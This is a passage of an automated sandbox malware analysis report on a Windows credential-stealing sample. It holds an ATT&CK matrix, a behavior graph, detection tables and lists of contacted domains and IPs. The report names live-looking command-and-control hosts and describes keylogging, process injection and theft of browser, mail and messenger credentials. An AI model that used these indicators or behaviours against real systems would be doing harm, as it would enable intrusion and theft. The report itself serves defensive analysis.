              Security Software Discovery              		SSH11
              Clipboard Data              		Data Transfer Size Limits112
              Application Layer Protocol              		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common1
              Access Token Manipulation              		Cached Domain Credentials2
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items212
              Process Injection              		DCSync4
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
              Application Window Discovery              		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1332661 Sample: #U0412#U0421_#U0436#U0438#U... Startdate: 26/10/2023 Architecture: WINDOWS Score: 100 30 ourt2949aslumes9.duckdns.org 2->30 32 gudanidevelopment.ge 2->32 34 geoplugin.net 2->34 48 Snort IDS alert for network traffic 2->48 50 Multi AV Scanner detection for domain / URL 2->50 52 Antivirus detection for dropped file 2->52 54 8 other signatures 2->54 8 #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe 4 39 2->8         started        signatures3 process4 file5 24 C:\Users\user\AppData\Local\...\System.dll, PE32 8->24 dropped 56 Writes to foreign memory regions 8->56 58 Maps a DLL or memory area into another process 8->58 12 wab.exe 4 17 8->12         started        signatures6 process7 dnsIp8 36 94.156.6.253, 2402, 50055, 50056 NET1-ASBG Bulgaria 12->36 38 gudanidevelopment.ge 217.147.225.69, 50054, 80 GRENA-ASTbilisiGeorgiaGE Georgia 12->38 40 geoplugin.net 178.237.33.50, 50057, 80 ATOM86-ASATOM86NL Netherlands 12->40 26 C:\Users\user\AppData\Local\...\Tramper.exe, PE32 12->26 dropped 28 C:\Users\user\AppData\Roaming\paqlgkfs.dat, data 12->28 dropped 60 Maps a DLL or memory area into another process 12->60 62 Installs a global keyboard hook 12->62 17 wab.exe 1 12->17         started        20 wab.exe 1 12->20         started        22 wab.exe 2 12->22         started        file9 signatures10 process11 signatures12 42 Tries to steal Instant Messenger accounts or passwords 17->42 44 Tries to harvest and steal browser information (history, passwords, etc) 17->44 46 Tries to steal Mail credentials (via file / registry access) 20->46

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe100%AviraHEUR/AGEN.1338455
              #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe21%VirustotalBrowse
              #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe5%ReversingLabs

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\Gummibaand\Tramper.exe100%AviraHEUR/AGEN.1338455
              C:\Users\user\AppData\Local\Temp\Gummibaand\Tramper.exe5%ReversingLabs
              C:\Users\user\AppData\Local\Temp\nsk21A3.tmp\System.dll0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              gudanidevelopment.ge0%VirustotalBrowse
              geoplugin.net0%VirustotalBrowse
              ourt2949aslumes9.duckdns.org13%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              https://eb2.3lifh0%Avira URL Cloudsafe
              https://aefd.nelreports.net/api/report?cat=bingaotak0%Avira URL Cloudsafe
              https://odc.officeaph0%Avira URL Cloudsafe
              http://www.imvu.comr0%Avira URL Cloudsafe
              https://csp.withgoogle.com/csp/ads-programmable0%Avira URL Cloudsafe
              https://csp.withgoogle.com/csp/ads-programmable0%VirustotalBrowse
              https://aefd.nelreports.net/api/report?cat=bingaotak0%VirustotalBrowse
              https://deff.nelreports.net/api/report?cat=msn0%Avira URL Cloudsafe
              https://cxcs.microsoft.net/static/public/tips/neutral/6c6740da-0bfe-48a6-83fc-c98d1919b060/3addf02b70%Avira URL Cloudsafe
              https://get3.adobe.coh0%Avira URL Cloudsafe
              https://csp.withgoogle.com/csp/botguard-scs0%Avira URL Cloudsafe
              https://csp.withgoogle.com/csp/report-to/active-view-scs-read-write-acl0%Avira URL Cloudsafe
              http://crls.pki.goog/gts1c3/QOvJ0N1sT2A.crl00%Avira URL Cloudsafe
              https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-light.wo0%Avira URL Cloudsafe
              https://cxcs.microsoft.net/static/public/tips/neutral/6c6740da-0bfe-48a6-83fc-c98d1919b060/3addf02b70%VirustotalBrowse
              https://deff.nelreports.net/api/report?cat=msn0%VirustotalBrowse
              https://btloader.com/tag?o=6208086025961472&upapi=true0%Avira URL Cloudsafe
              http://crls.pki.goog/gts1c3/QOvJ0N1sT2A.crl00%VirustotalBrowse
              http://www.imvu.comata0%Avira URL Cloudsafe
              https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-light.wo0%VirustotalBrowse
              https://contextual.med0%Avira URL Cloudsafe
              https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%20%Avira URL Cloudsafe
              https://csp.withgoogle.com/csp/report-to/active-view-scs-read-write-acl0%VirustotalBrowse
              https://csp.withgoogle.com/csp/botguard-scs0%VirustotalBrowse
              http://ocsp.sca1b.amazontrust.com060%Avira URL Cloudsafe
              http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
              https://pki.goog/repository/00%Avira URL Cloudsafe
              https://btloader.com/tag?o=6208086025961472&upapi=true0%VirustotalBrowse
              http://crl.rootg2.amazontrust.com/rootg2.crl00%Avira URL Cloudsafe
              https://odc.offiH0%Avira URL Cloudsafe
              https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%20%VirustotalBrowse
              https://pki.goog/repository/00%VirustotalBrowse
              https://aefd.nelreports.net/api/report?cat=bingrms0%Avira URL Cloudsafe
              https://tpc.g0%Avira URL Cloudsafe
              https://2542116.fls.doublecli0%Avira URL Cloudsafe
              https://cxcs.microsoft.net/api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&plat0%Avira URL Cloudsafe
              http://crl.pki.goog/gsr1/gsr1.crl0;0%Avira URL Cloudsafe
              https://aefd.nelreports.net/api/report?cat=bingrms0%VirustotalBrowse
              http://ocsp.sectigo.com00%Avira URL Cloudsafe
              https://csp.withgoogle.com/csp/report-to/botguard-scs0%Avira URL Cloudsafe
              https://cxcs.microsoft.net/api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&plat0%VirustotalBrowse
              http://crl.pki.goog/gsr1/gsr1.crl0;0%VirustotalBrowse
              https://aefd.nelreports.net/api/report?cat=bingth0%Avira URL Cloudsafe
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
              https://csp.withgoogle.com/csp/report-to/botguard-scs0%VirustotalBrowse
              https://aefd.nelreports.net/api/report?cat=bingth0%VirustotalBrowse
              http://crl.rootg2.amazontrust.com/rootg2.crl00%VirustotalBrowse
              http://crls.pki.goog/gts1c3/zdATt0Ex_Fk.crl00%Avira URL Cloudsafe
              https://csp.withgoogle.com/csp/report-to/adspam-signals-scs0%Avira URL Cloudsafe
              http://pki.goog/repo/certs/gts1c3.der070%Avira URL Cloudsafe
              http://crls.pki.goog/gts1c3/zdATt0Ex_Fk.crl00%VirustotalBrowse
              https://sb.scorecardresearch.com/beacon.js0%Avira URL Cloudsafe
              https://csp.withgoogle.com/csp/report-to/adspam-signals-scs0%VirustotalBrowse
              http://pki.goog/gsr1/gsr1.crt020%Avira URL Cloudsafe
              http://pki.goog/repo/certs/gts1c3.der0$0%Avira URL Cloudsafe
              https://sb.scorecardresearch.com/b2?c1=2&c2=3000001&cs_ucfr=1&rn=1632306836522&c7=https%3A%2F%2Fwww.0%Avira URL Cloudsafe
              https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_368%2Cw_622%2Cc_fill%2Cg_faces:au0%Avira URL Cloudsafe
              https://get3.adobe0%Avira URL Cloudsafe
              http://pki.goog/gsr1/gsr1.crt020%VirustotalBrowse
              https://sb.scorecardresearch.com/beacon.js0%VirustotalBrowse
              http://pki.goog/repo/certs/gts1c3.der071%VirustotalBrowse
              https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%Avira URL Cloudsafe
              http://geoplugin.net/json.gp0%Avira URL Cloudsafe
              http://pki.goog/repo/certs/gts1c3.der0$0%VirustotalBrowse
              https://sb.scorecardresearch.com/b2?c1=2&c2=3000001&cs_ucfr=1&rn=1632306836522&c7=https%3A%2F%2Fwww.0%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              gudanidevelopment.ge
              		217.147.225.69
              		truetrueunknown
              geoplugin.net
              		178.237.33.50
              		truefalseunknown
              ourt2949aslumes9.duckdns.org
              		unknown
              		unknowntrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://geoplugin.net/json.gpfalse
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://cdnjs.cloudflare.com/ajax/libs/gsap/3.5.1/gsap.min.jsbhv7197.tmp.9.drfalse
                		high
                http://www.imvu.comrwab.exe, 00000007.00000002.54485681162.00000000352A0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000B.00000002.49606365917.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://eb2.3lifhwab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		low
                https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k3.jpgbhv7197.tmp.9.drfalse
                  		high
                  https://odc.officeaphwab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/footer.pngbhv7197.tmp.9.drfalse
                    		high
                    https://ajax.aspnetcdn.com/ajax/jquery/jquery-3.3.1.min.jsbhv7197.tmp.9.drfalse
                      		high
                      https://csp.withgoogle.com/csp/ads-programmablebhv7197.tmp.9.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.nirsoft.netwab.exe, 00000009.00000002.49637274715.00000000030E3000.00000004.00000010.00020000.00000000.sdmpfalse
                        		high
                        https://aefd.nelreports.net/api/report?cat=bingaotakbhv7197.tmp.9.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC0ee8c30f496b428a91d7f3289a2b8a2bhv7197.tmp.9.drfalse
                          		high
                          https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC784fc6783b2f45a09cb8efa184cc684bhv7197.tmp.9.drfalse
                            		high
                            https://deff.nelreports.net/api/report?cat=msnbhv7197.tmp.9.drfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.google.com/chrome/wab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, bhv7197.tmp.9.drfalse
                              		high
                              http://cdp.thawte.com/ThawteRSACA2018.crl0Lbhv7197.tmp.9.drfalse
                                		high
                                https://cxcs.microsoft.net/static/public/tips/neutral/6c6740da-0bfe-48a6-83fc-c98d1919b060/3addf02b7bhv7197.tmp.9.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                https://get3.adobe.cohwab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.google.com/recaptcha/apiwab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://csp.withgoogle.com/csp/botguard-scsbhv7197.tmp.9.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://csp.withgoogle.com/csp/report-to/active-view-scs-read-write-aclbhv7197.tmp.9.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://s1.adform.net/Banners/Elements/Files/2070608/10170131/10170131.js?ADFassetID=10170131&bv=258bhv7197.tmp.9.drfalse
                                    		high
                                    http://crls.pki.goog/gts1c3/QOvJ0N1sT2A.crl0bhv7197.tmp.9.drfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.msn.combhv7197.tmp.9.drfalse
                                      		high
                                      https://sync-t1.taboola.com/sg/criteortb-network/1/rtb-h/?taboola_hm=b2df1cf6-0873-4430-916b-9612e80bhv7197.tmp.9.drfalse
                                        		high
                                        https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-light.wobhv7197.tmp.9.drfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://btloader.com/tag?o=6208086025961472&upapi=truebhv7197.tmp.9.drfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.imvu.comatawab.exe, 0000000B.00000002.49607571174.00000000039ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://use.typekit.net/af/eaf09c/000000000000000000017703/27/d?subset_id=2&fvd=n7&v=3bhv7197.tmp.9.drfalse
                                          		high
                                          https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svgbhv7197.tmp.9.drfalse
                                            		high
                                            https://b1sync.zemanta.com/usersync/msn/?puid=101156F9176C6E98058F466E16B36FACbhv7197.tmp.9.drfalse
                                              		high
                                              https://contextual.medwab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%2bhv7197.tmp.9.drfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCe691e5baee9945259179326d0658843bhv7197.tmp.9.drfalse
                                                		high
                                                http://ocsp.sca1b.amazontrust.com06bhv7197.tmp.9.drfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://certs.godaddy.com/repository/1301bhv7197.tmp.9.drfalse
                                                  		high
                                                  http://www.imvu.comwab.exe, wab.exe, 0000000B.00000002.49606365917.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000B.00000002.49607571174.00000000039ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://contextual.media.net/checkswab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://ocsp.rootca1.amazontrust.com0:bhv7197.tmp.9.drfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://certs.godaddy.com/repository/0bhv7197.tmp.9.drfalse
                                                        		high
                                                        https://pki.goog/repository/0bhv7197.tmp.9.drfalse
                                                        • 0%, Virustotal, Browse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.msn.com/bhv7197.tmp.9.drfalse
                                                          		high
                                                          https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCd01d50cad19649bf857a22be5995480bhv7197.tmp.9.drfalse
                                                            		high
                                                            http://cacerts.thawte.com/ThawteRSACA2018.crt0bhv7197.tmp.9.drfalse
                                                              		high
                                                              http://crl.godaddy.com/gdroot-g2.crl0Fbhv7197.tmp.9.drfalse
                                                                		high
                                                                http://crl.rootg2.amazontrust.com/rootg2.crl0bhv7197.tmp.9.drfalse
                                                                • 0%, Virustotal, Browse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chrom0;ord=8672137916610;wab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, bhv7197.tmp.9.drfalse
                                                                  		high
                                                                  https://www.msn.com/?ocid=iehpwab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49624792000.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, bhv7197.tmp.9.drfalse
                                                                    		high
                                                                    https://cvision.media.net/new/300x300/2/45/221/3/7d5dc6a9-5325-442d-926e-f2c668b8e65e.jpg?v=9bhv7197.tmp.9.drfalse
                                                                      		high
                                                                      https://odc.offiHwab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC8cd6be4f72cf4da1aa891e7da23d144bhv7197.tmp.9.drfalse
                                                                        		high
                                                                        https://aefd.nelreports.net/api/report?cat=bingrmsbhv7197.tmp.9.drfalse
                                                                        • 0%, Virustotal, Browse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://www.google.com/accounts/serviceloginwab.exefalse
                                                                          		high
                                                                          http://trc.taboola.com/p3p.xmlbhv7197.tmp.9.drfalse
                                                                            		high
                                                                            https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC028e72ad6b944b8183346fecb32a729bhv7197.tmp.9.drfalse
                                                                              		high
                                                                              https://tpc.gwab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://2542116.fls.doublecliwab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://cxcs.microsoft.net/api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&platbhv7197.tmp.9.drfalse
                                                                              • 0%, Virustotal, Browse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://crl.pki.goog/gsr1/gsr1.crl0;bhv7197.tmp.9.drfalse
                                                                              • 0%, Virustotal, Browse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k2.jpgbhv7197.tmp.9.drfalse
                                                                                		high
                                                                                http://crl.godaddy.com/gdig2s1-2558.crl0bhv7197.tmp.9.drfalse
                                                                                  		high
                                                                                  http://ocsp.sectigo.com0bhv7197.tmp.9.drfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://csp.withgoogle.com/csp/report-to/botguard-scsbhv7197.tmp.9.drfalse
                                                                                  • 0%, Virustotal, Browse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://www.msn.com/de-ch/https://wab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://certificates.godaddy.com/repository/0bhv7197.tmp.9.drfalse
                                                                                      		high
                                                                                      https://aefd.nelreports.net/api/report?cat=bingthbhv7197.tmp.9.drfalse
                                                                                      • 0%, Virustotal, Browse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://s1.adform.net/banners/scripts/rmb/Adform.DHTML.js?bv=626bhv7197.tmp.9.drfalse
                                                                                        		high
                                                                                        https://eb2.3lift.com/sync?wab.exe, 00000009.00000003.49624961996.00000000059B1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, bhv7197.tmp.9.drfalse
                                                                                          		high
                                                                                          https://acdn.adnxs.com/dmp/async_usersync.htmlbhv7197.tmp.9.drfalse
                                                                                            		high
                                                                                            https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.jsbhv7197.tmp.9.drfalse
                                                                                              		high
                                                                                              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comwab.exe, 00000007.00000002.54485681162.00000000352A0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000B.00000002.49606365917.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://crls.pki.goog/gts1c3/zdATt0Ex_Fk.crl0bhv7197.tmp.9.drfalse
                                                                                              • 0%, Virustotal, Browse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://csp.withgoogle.com/csp/report-to/adspam-signals-scsbhv7197.tmp.9.drfalse
                                                                                              • 0%, Virustotal, Browse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://pki.goog/repo/certs/gts1c3.der07bhv7197.tmp.9.drfalse
                                                                                              • 1%, Virustotal, Browse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7209567wab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, bhv7197.tmp.9.drfalse
                                                                                                		high
                                                                                                https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2bhv7197.tmp.9.drfalse
                                                                                                  		high
                                                                                                  https://srtb.msn.com/auction?a=de-ch&b=bba24733ba4a487f8f8706bf3811269e&c=MSN&d=https%3A%2F%2Fwww.msbhv7197.tmp.9.drfalse
                                                                                                    		high
                                                                                                    https://2542116.fls.doubleclick.net/activwab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://use.typekit.net/af/cb695f/000000000000000000017701/27/d?subset_id=2&fvd=n4&v=3bhv7197.tmp.9.drfalse
                                                                                                        		high
                                                                                                        https://www.msn.com/de-ch/?ocid=iehpbhv7197.tmp.9.drfalse
                                                                                                          		high
                                                                                                          https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0wab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, bhv7197.tmp.9.drfalse
                                                                                                            		high
                                                                                                            https://cdn.taboola.com/TaboolaCookieSyncScript.jsbhv7197.tmp.9.drfalse
                                                                                                              		high
                                                                                                              https://www.googletagservices.com/activeview/js/current/rx_lidar.js?cache=r20110914bhv7197.tmp.9.drfalse
                                                                                                                		high
                                                                                                                https://static.doubleclick.net/dynamic/5/283983386/11928812572019506176_2845462151855228713.jpegbhv7197.tmp.9.drfalse
                                                                                                                  		high
                                                                                                                  https://www.msn.com/spartan/en-gb/kernel/appcache/cache.appcache?locale=en-GB&market=GB&enableregulabhv7197.tmp.9.drfalse
                                                                                                                    		high
                                                                                                                    https://www.msn.com/spartan/ientp?locale=en-GB&market=GB&enableregulatorypsm=0&enablecpsm=0&NTLogo=1bhv7197.tmp.9.drfalse
                                                                                                                      		high
                                                                                                                      https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/otSDKStub.jsbhv7197.tmp.9.drfalse
                                                                                                                        		high
                                                                                                                        https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCefb91313fdae420ebbea45d8f044894bhv7197.tmp.9.drfalse
                                                                                                                          		high
                                                                                                                          https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gtm=wab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, bhv7197.tmp.9.drfalse
                                                                                                                            		high
                                                                                                                            https://www.google.com/pagead/drt/uiwab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49628482785.00000000051B1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, bhv7197.tmp.9.drfalse
                                                                                                                              		high
                                                                                                                              https://s1.adform.net/stoat/626/s1.adform.net/bootstrap.jsbhv7197.tmp.9.drfalse
                                                                                                                                		high
                                                                                                                                https://sb.scorecardresearch.com/beacon.jsbhv7197.tmp.9.drfalse
                                                                                                                                • 0%, Virustotal, Browse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                http://pki.goog/gsr1/gsr1.crt02bhv7197.tmp.9.drfalse
                                                                                                                                • 0%, Virustotal, Browse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                http://pki.goog/repo/certs/gts1c3.der0$bhv7197.tmp.9.drfalse
                                                                                                                                • 0%, Virustotal, Browse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://sb.scorecardresearch.com/b2?c1=2&c2=3000001&cs_ucfr=1&rn=1632306836522&c7=https%3A%2F%2Fwww.bhv7197.tmp.9.drfalse
                                                                                                                                • 0%, Virustotal, Browse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_368%2Cw_622%2Cc_fill%2Cg_faces:aubhv7197.tmp.9.drfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://get3.adobewab.exe, 00000009.00000003.49630520710.00000000051BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.49630570467.00000000051BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCacc6c4ed30494f9fad065afe638a7cabhv7197.tmp.9.drfalse
                                                                                                                                  		high
                                                                                                                                  https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhv7197.tmp.9.drfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  https://cvision.media.net/new/300x300/2/75/165/127/fefc2984-60ee-407b-a704-0db527f30f53.jpg?v=9bhv7197.tmp.9.drfalse
                                                                                                                                    		high

                                                                                                                                    World Map of Contacted IPs

                                                                                                                                    • No. of IPs < 25%
                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                    • 75% < No. of IPs

                                                                                                                                    Public IPs

                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                    94.156.6.253
                                                                                                                                    		unknownBulgaria
                                                                                                                                    		43561NET1-ASBGtrue
                                                                                                                                    217.147.225.69
                                                                                                                                    		gudanidevelopment.geGeorgia
                                                                                                                                    		20545GRENA-ASTbilisiGeorgiaGEtrue
                                                                                                                                    178.237.33.50
